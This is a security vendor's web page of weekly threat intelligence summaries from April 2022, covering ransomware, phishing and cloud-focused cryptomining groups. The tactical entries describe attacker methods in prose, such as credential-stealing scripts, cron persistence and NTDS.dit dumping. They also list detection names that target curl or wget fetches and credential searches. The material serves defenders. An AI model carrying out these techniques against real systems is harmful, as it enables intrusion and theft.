The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

REvil Return?

April 26, 2022

REvil Return?

Industry: N/A | Level: Strategic | Source: BleepingComputer

After months of inactivity, REvil ransomware servers have come online in the TOR network directing to a new operation assumed to have started in mid-December 2021. Reported by Bleeping Computer and identified by security researchers pancak3 and Soufiane Tahiri, discovered on a Russian-speaking forum, RuTOR a new REvil leak site is being promoted. “The new site is hosted on a different domain but leads to the original one REvil used when active, Bleeping Computer confirmed today.” The site gathers affiliates providing a new copy of the REvil ransomware along with an 80/20 split. While old victim pages have been posted, there are new victims listed on the site including Oil India. While no concrete leads, affiliates associated with the new site, members, and/or a sample of the new REvil ransomware, the activity around REvil remains a mystery and will require additional investigation.

Rise in LinkedIn Phishing Lures

April 26, 2022

Rise in LinkedIn Phishing Lures

Industry: N/A | Level: Strategic | Source: CheckPoint

Social Media network has surpassed shipping, retail, and technology as the most targeted category for phishing. Previous campaigns have involved the usage of delivery tracking emails as lures however, the abuse with LinkedIn has accounted for over half (52%) of phishing emails based on CheckPoint’s research for the first quarter of 2022. The change in theme was quite dramatic as in the previous quarter, the LinkedIn theme was only utilized for 8% of phishing attempts. Threat actors appear to be leveraging the LinkedIn lures to obtain user credentials to the social media platform. Shipping companies are still a prominent abuse category, whilst in second place the timing to abuse victims remains rich to take advantage of e-commerce sales. The list of the 10 most abused brands of Q1 2022 by CheckPoint based on their usage is as follows LinkedIn (52%), DHL (14%), Google (7%), Microsoft (6%), FedEx (6%), WhatsApp (4%), Amazon (2%). Maersk (1%), AliExpress (0.8%) and Apple (0.8%).

FBI Warns of Ransomware Threat to Food and Agriculture Organizations

April 26, 2022

FBI Warns of Ransomware Threat to Food and Agriculture Organizations

Industry: Agriculture | Level: Strategic | Source: IC3

The US Federal Bureau of Investigation (FBI), latest private industry notification alerts of ransomware actors likely to target agricultural cooperatives during critical planting and harvest seasons. The attacks aim to disrupt business operations, create financial losses, and impact the supply chain. As described in the report, “The FBI noted ransomware attacks during these seasons against six-grain cooperatives during the fall 2021 harvest and two attacks in early 2022 that could impact the planting season by disrupting the supply of seeds and fertilizer. Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” Initial attack vectors from threat actors appear from common vulnerabilities with secondary infections resulting from the compromise of network resources or managed services. In 2022 there have been two identified impacts on agricultural companies. A multi-state graining company was impacted by Lockbit 2.0 in March 2022 and in February 2022 a feed milling, agricultural services company identified and prevented a potential network intrusion. There are severe repercussions to supply chain impact from grain production as it would affect consumers, animals, and commodities for trading.

Vigilance for Critical Infrastructure Defense

April 26, 2022

Vigilance for Critical Infrastructure Defense

Industry: Critical Infrastructure | Level: Strategic | Source: Defense.gov

A joint advisory provided by the Cybersecurity and Infrastructure Security Agency (CISA) along with Australia, Canada, New Zealand, and the United Kingdom, urges critical infrastructure operators to remain alert to cyber activity from Russia. As the conflict continues to impact Russia’s economy, intelligence continues to point towards the Russian government exploring options for cyberattacks. As provided in the advisory, government agencies are urging vigilance, “U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge critical infrastructure network defenders to prepare for and mitigate potential cyber threats—including destructive malware, ransomware, DDoS attacks, and cyber espionage—by hardening their cyber defenses and performing due diligence in identifying indicators of malicious activity.”

Lapsus$ Breached T-Mobile

April 26, 2022

Lapsus$ Breached T-Mobile

Industry: N/A | Level: Strategic | Source: Krebs On Security

Through review of activity from data extortion group Lapsus$, independent researcher, Brian Krebs, has identified a breach of wireless network operator, T-Mobile in March 2022. Krebs obtained private chat messages from the Lapsus$ members and indications are the group has breached T-Mobile multiple times, obtaining source code for various company projects to extort the communications provider for financial gain. T-Mobile has confirmed the breach, however, has stated customer and government data was not compromised in statements to Bleeping Computer, “The systems accessed contained no customer or government information or other similarly sensitive information, and we have no evidence that the intruder was able to obtain anything of value.” Chat logs, examined by Krebs, dove into the group’s operations thanks to the member’s candid conversations. The Lapsus$ hackers obtained access from purchasing compromised systems and credentials on the Russian Market. Additionally, the group has enticed insiders to supply access, with T-Mobile employees providing internal access and capabilities to Lapsus$ hackers to conduct “SIM swaps.” Although the hackers were shut out from time to time with T-Mobile employees logging into their own account or conducting a password change, Lapsus$ was able to discover or purchase another set of T-Mobile’s VPN credentials. A T-Mobile customer management tool, Atlas was compromised by Lapsus$ on March 19th, 2022, with the threat actors attempting to access accounts related to the FBI and Department of Defense however, the information required “additional verification procedures before any changes could be processed” thwarting the attackers’ attempts to access government account data

Docker Targeted by LemonDuck

April 26, 2022

Docker Targeted by LemonDuck

Industry: N/A | Level: Tactical | Source: CrowdStrike

Intelligence from CrowdStrike tracked operations from cryptomining botnet, LemonDuck targeting Docker. A unique aspect of the campaign has identified the usage of proxy pools to enable the attackers to hide the wallet address, “Proxy pools help in hiding the actual crypto wallet address where the contributions are made by current mining activity.” LemonDuck’s initially gained access by compromising exposed Docker APIs. Once infiltrated, a custom Docker ENTRYPOINT is used to set executables that will always run when the container is initiated, in order to download a bash script that masquerades as a PNG file. The script sets a cronjob and downloads an additional bash file disguised as “a.asp,” which is the true payload in the attack. Prior to initiating the mining operation, the script terminates processes, network communication, and/or indicators that could be rival cryptominers as well as terminating daemons for crond, sshd and syslog. LemonDuck operators are also capable of disabling Alibaba’s cloud monitoring service. The mining setup operation completes with the download of XMRig. Lateral movement activity with LemonDuck is observed through SSH, from locating SSH keys, attackers log into servers and continue to deploy scripts.

  • Anvilogic Scenario: LemonDuck Cryptomining Campaign with initial Bash Script
  • Anvilogic Use Cases:
    • Publicly exposed Docker API
    • Rare shell script execution
    • Crontab Job Scheduling (Unix)
    • File Download (Unix)
    • Locate Credentials
    • Service Stop Commands
    • SSH Pivoting
    • Multiple SSH Logins Across Different Machines

TeamTNT Scripts

April 26, 2022

TeamTNT Scripts

Industry: N/A | Level: Tactical | Source: CiscoTalos

Various script files used by the threat group, TeamTNT against AWS and Alibaba have been examined by Cisco Talos. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. The  ability of the scripts  varies as they are capable of initiating cryptocurrency mining, credential gathering, downloading additional payloads, modifying file permissions, disabling tools, and achieving persistence and lateral movement. An AWS credential discovery and stealing script “GRABBER_aws_cloud.sh” can  enumerate the host’s directory, querying for the string AWS. When matches are identified, the script writes the result to a file, exfiltrates the data, and deletes the created file. Scripts downloading payloads often conduct a check on the system’s architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space, in addition to the abundance of robust scripts, the group has initiated techniques observed by Trend Micro, Cado Security, and Cisco Talos to disable cloud security and cloud logs. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted some omissions have been observed by Cisco Talos, “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools.”

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Locate Credentials
    • Linux CURL or WGET Direct to IPv4 Address
    • File Download (Unix)
    • Rare shell script execution
    • Service Stop Commands
    • Output to File
    • Modify File Attributes
    • New Linux Service Started/Enabled
    • File Modified for Execution
    • File Execution (Unix)
    • New Docker Container

Catching Up With Emotet

April 26, 2022

Catching Up With Emotet

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed activity from Emotet campaigns through the delivery of malicious documents using a variety of attack techniques. Since the malware’s reemergence in November 202, it has been highly active. However, activity has slightly tapered potentially due to Microsoft disabling Excel 4.0 macro by default in January 2022. Analysis of five malicious document samples has identified the use of Excel or a Word document containing either malicious VBA macro or Excel 4.0 macro to deliver Emotet. The execution following the malware typically utilizes wscript, PowerShell, or Mshta to download the Emotet payload. Following its download, the malware would be executed with rundll32 or regsvr32.

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line

Trend Micro Analyzes BlackCat Ransomware

April 26, 2022

Trend Micro Analyzes BlackCat Ransomware

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro shares details of an incident involving BlackCat ransomware to provide an insight into the infection sequence. The attack began with the identification of suspicious web shells on Microsoft Exchange Servers having exploited ProxyLogon and ProxyShell vulnerabilities. Activity following involved PowerShell having been spawned from Internet Information Services (IIS) worker process (w3wp.exe) to download a Cobalt Strike Beacon and a DLL file that was executed with rundll32.exe. Through process injection of Windows error reporting process, WerFault.exe the attackers initiated commands for discovery, credentials access with CrackMapExec dumping NTDS.dit and spreading laterally in the environment through SMB. Prior to ransomware execution, the attackers launched batch scripts however, the script was not captured by Trend Micro for analysis.

  • Anvilogic Scenario: BlackCat Ransomware: Post-Exploitation of Exchange
  • Anvilogic Use Cases:
    • Exchange New Export Request
    • Potential Web Shell
    • Potential ProxyShell
    • IIS Worker (W3WP) Spawn Command Line
    • Suspicious File written to Disk
    • Rundll32 Command Line
    • Common Active Directory Commands
    • SharpHound Enumeration
    • SharpHound Keywords
    • Python Execution
    • Rare Remote Thread
    • NTDSUtil.exe execution
    • Potential Lateral Movement via SMB
    • Executable Create Script Process
    • Encoded Powershell Command